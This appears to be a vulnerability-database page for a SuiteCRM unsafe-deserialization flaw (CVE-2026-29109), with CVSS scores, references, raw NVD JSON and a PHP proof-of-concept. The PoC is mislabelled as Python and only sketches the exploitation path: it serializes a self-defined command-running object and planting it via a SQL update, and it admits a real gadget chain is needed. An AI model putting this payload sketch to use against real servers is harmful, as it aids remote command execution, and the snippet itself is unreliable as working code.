CVE-2026-29109

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions up to and including 8.9.2 contain an unsafe deserialization vulnerability in the SavedSearch filter processing component that allows an authenticated administrator to execute arbitrary system commands on the server. `FilterDefinitionProvider.php` calls `unserialize()` on user-controlled data from the `saved_search.contents` database column without restricting instantiable classes. Version 8.9.3 patches the issue.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE

SuiteCRM <= 8.9.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// PoC for CVE-2026-29109
// This script generates a payload that executes a system command when unserialized.
// Note: Actual exploitation requires a valid POP chain (Gadget) available in the SuiteCRM environment.

class ExploitObject {
    public $cmd;

    function __destruct() {
        // In a real scenario, this would be triggered by a library's magic method
        if (isset($this->cmd)) {
            system($this->cmd);
        }
    }
}

// Configuration
$command = 'id'; // Command to execute
$target_user_id = 1; // Admin user ID to impersonate in database

// Generate Payload
$exploit = new ExploitObject();
$exploit->cmd = $command;
$payload = serialize($exploit);

// Output the payload
echo "Generated Payload: " . $payload . "\n";

// SQL Injection or Database Update Concept
// The attacker would update the 'saved_search' table for the target user.
/*
UPDATE saved_search 
SET contents = '[PAYLOAD]' 
WHERE id = [SEARCH_ID] AND assigned_user_id = [ADMIN_ID];
*/

// Replace [PAYLOAD] with the serialized string above.
// When the Admin views the saved search, unserialize() is called, triggering the payload.
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29109
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29109
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29109/
[4] VulDB https://vuldb.com/cve/CVE-2026-29109
[5] https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-mhq2-277m-6w24

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29109", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:16.147", "lastModified": "2026-03-23T16:48:58.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions up to and including 8.9.2 contain an unsafe deserialization vulnerability in the SavedSearch filter processing component that allows an authenticated administrator to execute arbitrary system commands on the server. `FilterDefinitionProvider.php` calls `unserialize()` on user-controlled data from the `saved_search.contents` database column without restricting instantiable classes. Version 8.9.3 patches the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Las versiones hasta la 8.9.2 inclusive contienen una vulnerabilidad de deserialización insegura en el componente de procesamiento de filtros SavedSearch que permite a un administrador autenticado ejecutar comandos de sistema arbitrarios en el servidor. 'FilterDefinitionProvider.php' llama a 'unserialize()' en datos controlados por el usuario de la columna de la base de datos 'saved_search.contents' sin restringir las clases instanciables. La versión 8.9.3 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.9.3", "matchCriteriaId": "CD824E64-58E0-472C-84CB-6729B4B791DF"}]}]}], "references": [{"url": "https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-mhq2-277m-6w24", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}